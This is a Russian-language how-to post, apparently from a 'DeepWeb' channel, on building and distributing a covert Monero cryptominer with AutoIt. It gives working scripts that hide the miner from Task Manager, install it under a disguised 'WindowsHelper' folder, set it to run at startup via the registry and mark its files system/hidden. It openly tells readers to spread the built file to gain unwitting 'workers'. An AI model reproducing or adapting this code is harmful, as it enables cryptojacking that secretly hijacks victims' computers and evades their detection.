Свой скрытый майнер в несколько шагов

Свой скрытый майнер в несколько шагов

DeepWeb

Добрый день!

Сегодня мы будем делать майнер.


Что он умеет:

-Скрытие от диспетчера задач

-Автозагрузка

-Прописывается, как системный файл

-Майнит Monero на CPU

-Поддерживает только x64 системы

-Нагружает систему на 50%

Детект

Итак, для создания сия чуда нам понадобится:

AutoIT

SciTE4Autoit3

После того, как установили их, то качаем ещё голову майнера и там же лежат исходники: (Password: 352 )

Yandex.Disk


Итак, создаем на диске С папку под названием "1"

Туда распаковываем всё с архива.

Тыкаем правой кнопкой мыши по файлу "1" и выбираем Edit Script

Код

#NoTrayIcon
While 1
If Not  ProcessExists  ("taskmgr.exe")  Then
   If Not ProcessExists  ("system.exe") Then ; исходник майнера
Run ("system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [EMAIL]your_mail@ya.ru[/EMAIL] -p x ","",@SW_HIDE) ; Тут пишем свою почту с майнергейта или монеро кошелёк для других пулов
Sleep(1000)
Else
   Sleep (1000)
 Do
    Sleep (1000)
    Until ProcessExists  ("taskmgr.exe")
ProcessClose ("system.exe")
EndIf
EndIf
Sleep (3000)
WEnd


Вместо your_mail@ya.ru пишем свою почту


Дальше билдим (CTRL+F7)

Вписываем названием нашего майнера и нажимаем "Compile Script"

В папке со всеми файлами у нас появился билд нашего майнера. Теперь нам нужно сделать для него установщик​


Открываем файл под названием "2"

Код:

#NoTrayIcon




If Not FileExists (@AppDataDir & "\WindowsHelper") Then
DirCreate (@AppDataDir & "\WindowsHelper")
EndIf

FileInstall ("C:\1\Имя_вашего,майнера.exe", @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")
FileInstall ("C:\1\system.exe", @AppDataDir & "\WindowsHelper\system.exe")


Sleep (1000)

$pathscript = @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe"
$sName = ("Имя_вашего,майнера.exe")
RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', $sName, "REG_SZ", $pathscript)



Sleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe", "+SHR")
FileSetAttrib (@AppDataDir & "\WindowsHelper\system.exe", "+SHR")
FileSetAttrib (@AppDataDir & "\WindowsHelper", "+SHR")

Sleep(1000)

Run (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")


Вместо "Имя вашего майнера"

вписываем название билда, который мы сделали. Должно получиться как-то так:


И, собственно говоря, билдим это чудо (CTRL+F7)


Указываем имя для нашего файла и выбираем иконку. В разделе Resource Update указываем версию, комментарий и компанию


В папке появился майнер с тем названием, которое вы указывали. Этот файл мы распространяем и получаем наших воркеров.


Скрипт для удаления (перед запуском закрыть майнер через ProcessHacker)

#NoTrayIcon
#RequireAdmin



If FileExists (@AppDataDir & "\WindowsHelper") Then
Sleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper", "-SHR")

Sleep(1000)

DirRemove(@AppDataDir & "\WindowsHelper", 1)
EndIf

Всем приятного пользования!

Всего доброго!​


Report Page